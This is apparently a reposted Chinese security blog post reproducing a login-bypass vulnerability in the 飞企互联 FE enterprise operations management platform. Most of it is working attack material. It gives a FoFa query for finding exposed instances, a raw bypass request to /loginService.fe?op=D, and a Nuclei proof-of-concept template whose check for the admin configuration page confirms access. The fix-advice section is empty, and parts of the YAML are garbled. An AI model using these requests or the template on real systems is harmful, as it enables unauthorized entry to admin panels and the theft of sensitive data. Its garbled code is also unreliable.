免责声明
此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们!
漏洞概述
飞企互联-FE企业运营管理平台多处接口处存在登录绕过,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息。
FoFa
app="飞企互联-FE企业运营管理平台"
漏洞复现
GET /loginService.fe?op=D HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Nuclei Poc
id: fe-enterprise-bypass-login-config
info:
name: 飞企互联-FE企业运营管理平台-登录绕过
author: rain
severity: critical
metadata:
app="飞企互联-FE企业运营管理平台" :
requests:
raw:
|
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 :
|
GET /main/main.jsp HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Geck :
true :
attack: batteringram
payloads:
path:
/2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056
/loginService.fe?op=D
true :
matchers:
type: dsl
dsl:
status_code_2 == 200 && contains(body_2,'系统配置')
修复建议
原文始发于微信公众号(知黑守白):【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论